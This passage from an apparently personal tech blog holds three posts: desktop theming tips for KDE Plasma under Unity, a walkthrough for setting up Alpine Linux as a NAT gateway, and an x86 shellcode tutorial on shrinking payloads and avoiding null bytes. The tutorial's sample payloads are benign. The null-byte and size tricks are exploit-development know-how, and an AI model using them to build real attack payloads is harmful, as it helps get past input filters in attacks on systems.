<b><span style="font-size: large;">3. Make plasma look better in unity</span></b><br />
a. System Settings > Application Appearance > Widget Style > GTK+<br />
b. System Settings > Workspace Appearance > Desktop theme > Get new theme<br />
c. Search for ‘Ambiance’<br />
d. install it and use it.<br />
e. remove the bottom panel if you don't like it.<br />
<span style="font-size: large;"><b>4. Use the nautilus as default folder manager</b></span><br />
control center(system setting) > file associations > inode > directory [ then add: "nautilus --no-desktop" ]<br />
or you can just install dolphin if you don't like nautilus. <br />
<br />
That's it, enjoy!! <br />
<br />
reference website:<br />
<a href="http://www.omgubuntu.co.uk/2011/05/how-to-run-kde-plasma-widgets-in-ubuntu-unity/">http://www.omgubuntu.co.uk/2011/05/how-to-run-kde-plasma-widgets-in-ubuntu-unity/</a><br />
<a href="https://bbs.archlinux.org/viewtopic.php?id=48046">https://bbs.archlinux.org/viewtopic.php?id=48046</a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-26856155006788830982011-11-12T08:25:00.000-08:002011-11-12T08:25:41.020-08:00setting linux as a gateway<div style="font-family: &quot;Courier New&quot;,Courier,monospace;"><span style="font-size: x-large;">Introduction: </span></div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;">Since my school project needs an ethernet environment, I need to create an internal network under virtualbox. The first step is to set up the gateway inside virtualbox. After googling for a while, I finally set up my linux as a gateway. </div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;"><span style="font-size: large;">Environment : </span></div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;">linux distribution: alpine linux 2.3</div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;">kernel version: 3.0</div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;"> virtualbox network adapter setting:</div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;"> 1. host-only network=> eth0 for internal network.</div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;"> 2. bridged network => eth1 for internet. </div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;">the connection state is like the following figure:</div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;"><figure> </div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;"><<internet>>----------<<alpine linux>>------------<<internal>></div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;"> eth1 pppoe eth0 NAT</div><div style="font-family: &quot;Courier New&quot;,Courier,monospace;"><br />
</div><span style="font-family: "Courier New",Courier,monospace;">P.S </span><br />
<span style="font-family: &quot;Courier New&quot;,Courier,monospace;">The reason why I use alpine linux instead of another distribution is that it is tiny but contains the utilities needed to set up my environment.</span><br />
<span style="font-family: "Courier New",Courier,monospace;">alpine linux </span><span style="font-family: "Courier New",Courier,monospace;">download link:</span><br />
<span style="font-family: "Courier New",Courier,monospace;"><a href="http://alpinelinux.org/">http://alpinelinux.org/</a></span><br />
<span style="font-family: "Courier New",Courier,monospace;">alpine linux </span><span style="font-family: "Courier New",Courier,monospace;">installation guide:</span><br />
<span style="font-family: "Courier New",Courier,monospace;"><a href="http://wiki.alpinelinux.org/wiki/Installation">http://wiki.alpinelinux.org/wiki/Installation</a> </span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-large;">Content: </span></span><br />
<span style="font-family: &quot;Courier New&quot;,Courier,monospace;">I'll write down all the steps I used to configure the network.</span><br />
<span style="font-family: &quot;Courier New&quot;,Courier,monospace;">including: </span><br />
<span style="font-family: "Courier New",Courier,monospace;">1. package requirement</span><br />
<span style="font-family: "Courier New",Courier,monospace;">2. configure the network interface</span><br />
<span style="font-family: "Courier New",Courier,monospace;">3. setting up the iptables</span><br />
<span style="font-family: "Courier New",Courier,monospace;">4. enable packet forwarding</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> </span><span style="font-size: large;"><span style="font-family: "Courier New",Courier,monospace;">1.package requirement:</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"></span><br />
<b><span style="font-family: "Courier New",Courier,monospace;">rp-pppoe => pppoe client side program</span></b><br />
<b><span style="font-family: "Courier New",Courier,monospace;">iptables => firewall</span></b><br />
<span style="font-family: &quot;Courier New&quot;,Courier,monospace;"><b>ppp => ppp daemon</b></span><br />
<span style="font-family: "Courier New",Courier,monospace;">that's all. </span><br />
<br />
<span style="font-size: large;"><i><span style="font-family: "Courier New",Courier,monospace;">2.configure the network interface</span></i></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="font-size: small;"><span style="font-size: large;">2.1. the internal network:</span></span></span><br />
<span style="font-family: &quot;Courier New&quot;,Courier,monospace;"> configure /etc/network/interfaces</span><br />
<span style="font-family: &quot;Courier New&quot;,Courier,monospace;"> add the following lines to the file.</span><br />
<pre>auto eth0
iface eth0 inet static
address <span style="color: #008c00;">192</span>.<span style="color: #008c00;">168</span>.<span style="color: #008c00;">56</span>.<span style="color: #008c00;">254</span>
netmask <span style="color: #008c00;">255</span>.<span style="color: #008c00;">255</span>.<span style="color: #008c00;">255</span>.<span style="color: #008c00;">0</span>
network <span style="color: #008c00;">192</span>.<span style="color: #008c00;">168</span>.<span style="color: #008c00;">56</span>.<span style="color: #008c00;">0</span>
broadcast <span style="color: #008c00;">192</span>.<span style="color: #008c00;">168</span>.<span style="color: #008c00;">56</span>.<span style="color: #008c00;">255</span><span style="color: #008c00;"></span></pre><span style="font-family: &quot;Courier New&quot;,Courier,monospace;"> the address, netmask, network and broadcast can be changed according to your network setting (the broadcast address must be the last address of the /24 given above). </span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="font-size: large;">2.2.pppoe configuration:</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> type </span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <b>pppoe-setting</b> => to start pppoe configuration. </span><br />
<span style="font-family: "Courier New",Courier,monospace;"> After setting up type </span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <b>pppoe-connect</b> => connect to the internet via pppoe. </span><br />
<span style="font-family: "Courier New",Courier,monospace;"> You can check the result by typing:</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <b>ifconfig | less</b></span><br />
<br />
<span style="font-size: large;"><span style="font-family: "Courier New",Courier,monospace;">3.setting up the iptables:</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> type the following command to set the iptables rules: </span><br />
<div style="font-family: "Courier New",Courier,monospace;"> <b>iptables -A FORWARD -o eth1 -i eth0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT</b></div><div style="font-family: "Courier New",Courier,monospace;"><b> iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT </b></div><div style="font-family: "Courier New",Courier,monospace;"><b> iptables -A POSTROUTING -t nat -j MASQUERADE</b> </div><div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: large;">4.enable packet forwarding:</span></div><div style="font-family: "Courier New",Courier,monospace;"> type </div><div style="font-family: "Courier New",Courier,monospace;"> <b>echo 1 > /proc/sys/net/ipv4/ip_forward</b></div><div style="font-family: "Courier New",Courier,monospace;"> type</div><div style="font-family: "Courier New",Courier,monospace;"> <b>cat /proc/sys/net/ipv4/ip_forward</b> => check the result.</div><div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-large;">reference website:</span></div><div style="font-family: "Courier New",Courier,monospace;">http://wiki.alpinelinux.org/wiki/Alpine_Linux_package_management#Packages_and_Repositories</div><div style="font-family: "Courier New",Courier,monospace;">http://www.linuxfromscratch.org/blfs/view/6.2.0/connect/other.html</div><div style="font-family: "Courier New",Courier,monospace;">http://tldp.org/HOWTO/DSL-HOWTO/configure.html</div><div style="font-family: "Courier New",Courier,monospace;">http://www.brennan.id.au/05-Broadband_Connectivity.html</div><div style="font-family: "Courier New",Courier,monospace;">https://help.ubuntu.com/community/Internet/ConnectionSharing</div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-52983532721899918412011-10-31T05:43:00.000-07:002014-03-08T08:54:06.919-08:00shell code 6(reduced the shellcode size)The size of shellcode is very important. Therefore I list some of the tricks that can reduce the shellcode size and moreover rewirte our shellcode to reduce the size.<br />
<br />
1.<br />
Instead of using movl $constant, %register, use xor, mul and lea. A movl of a 32-bit immediate into a register costs five bytes (one opcode byte plus a four-byte immediate), whereas xor reg,reg and mul reg cost two bytes and lea disp8(reg),reg costs three. This removes a lot of bytes from the shellcode, and it has a second benefit: the four-byte immediate of a small constant is mostly zero bytes, which cut the payload short when it is delivered through a string function, while xor, mul and lea encode without any zero byte.<br />
<br />
The following is a quick example for the exit system call.<br />
This is the original one that I wrote in the previous articles.<br />
<pre class="brush: cpp">
int main() {
    /* exit(0) on 32-bit Linux: eax = 1 (__NR_exit), ebx = exit status;
       both constants are loaded with full 32-bit immediates */
    __asm__("movl $1, %eax;\
             movl $0, %ebx;\
             int $0x80;");
    return 0;
}
</pre>
The size of each instruction is<br />
<div style="font-family: "Courier New",Courier,monospace;">mov $1, %eax => 5 bytes.</div><div style="font-family: "Courier New",Courier,monospace;">mov $0, %ebx => 5 bytes.</div><div style="font-family: "Courier New",Courier,monospace;">int $0x80 => 2 bytes.</div><div style="font-family: "Courier New",Courier,monospace;">------------------------------------ </div><div style="font-family: "Courier New",Courier,monospace;">total bytes 12 bytes.</div><br />
However, if we rewrite the shellcode into the following code:<br />
<pre class="brush: cpp">
int main() {
__asm__("xorl %ebx, %ebx;\
leal 0x1(%ebx), %eax;\
int $0x80;");
return 0;
}
</pre>
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;">The size of the shellcode become:</span></span><br />
<div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span">xorl %ebx, %ebx => 2 bytes</span></div><div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span">leal 0x1(%ebx), %eax => 3 bytes</span></div><div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span">int $0x80 => 2 bytes</span></div><div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span"> --------------------------------------------</span></div><div style="font-family: "Courier New",Courier,monospace;"><span class="Apple-style-span">total size 7 bytes</span></div><br />
<div style="font-family: inherit;"><span class="Apple-style-span">yes, reduce 5 bytes of the shellcode. :D</span></div><div style="font-family: inherit;"><span class="Apple-style-span">another example of reducing the shellcode:</span></div>
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 0x20;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #1byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call -0x37;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="font-family: inherit;"><span class="Apple-style-span">This code is the write system call that I wrote in the previous article.</span></div><div style="font-family: inherit;"><span class="Apple-style-span">The code size of this shellcode is 46 bytes long.</span></div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;">rewrite the shellcode</span> </span><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 0x20;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #1byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> mul </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x4(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax),</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #3byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x7(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx),</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #3byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x1(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx), </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #3byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80; #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call -0x37;</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #7byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span></pre></div><div style="font-family: inherit; margin: 0px;"><span class="Apple-style-span">The code size is reduce to 34 bytes long.</span></div><div style="margin: 0px;"><div style="font-family: inherit;"><span class="Apple-style-span">P.S the mul instruction will save the result to %eax and %edx, therefore the %eax and %edx is now being set to zero. </span></div></div><div style="margin: 0px;"></div><div style="font-family: inherit; margin: 0px;"><span class="Apple-style-span">2. </span></div>The push trick and relative jmp/call trick both can get the address of the data, but sometimes using the push trick in the right condition can reduce some bytes of the shellcode.<br />
Consider the following example from shell code 3. It calls system call 162, which on 32-bit x86 Linux is nanosleep (the earlier post calls it the wait system call): %ebx points to a struct timespec {2, 0} and %ecx is the NULL rem pointer, so the shellcode sleeps for two seconds and then calls exit.<br />
<span class="Apple-style-span" style="color: black; font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;"><span style="font-family: inherit;"></span></span></span><br />
<div style="margin: 0px;"><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #595979;">/* relative jmp/call trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pop </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .long 0x00000002,0x0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span> </pre><pre style="background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">The above code is 42 bytes.</pre><pre style="background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"> </pre></div><pre style="background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #595979;">/* push trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">push $0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $2;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;"> </span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">} </span></pre><div style="margin: 0px;">The code size is 30 bytes.<br />
By using the push trick we saved 12 bytes of shellcode: the jmp, the call, the pop and the 8 bytes of data are gone, and the two pushes cost 4 bytes in total. Nice!!!<br />
<br />
3.<br />
The 0x66 prefix, i.e. the 16-bit and 8-bit mov instructions.<br />
If the constant fits in 16 bits, use movw (the assembler emits the 0x66 operand-size prefix and a two-byte immediate): four bytes instead of five. If the constant fits in 8 bits, use movb into the low byte of the register (%al, %bl, ...), which costs only two bytes.<br />
The catch: movw and movb only overwrite the low 16 or 8 bits and leave the rest of the register untouched, so the register has to be zeroed first (xorl %eax, %eax, two bytes); otherwise the system call number or the argument is whatever garbage was in the upper bits. A zeroed register also replaces push $0, which encodes as 6A 00 and so carries a zero byte, with a one-byte push of that register.<br />
Rewrite the previous example:<br />
<div style="margin: 0px;"><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
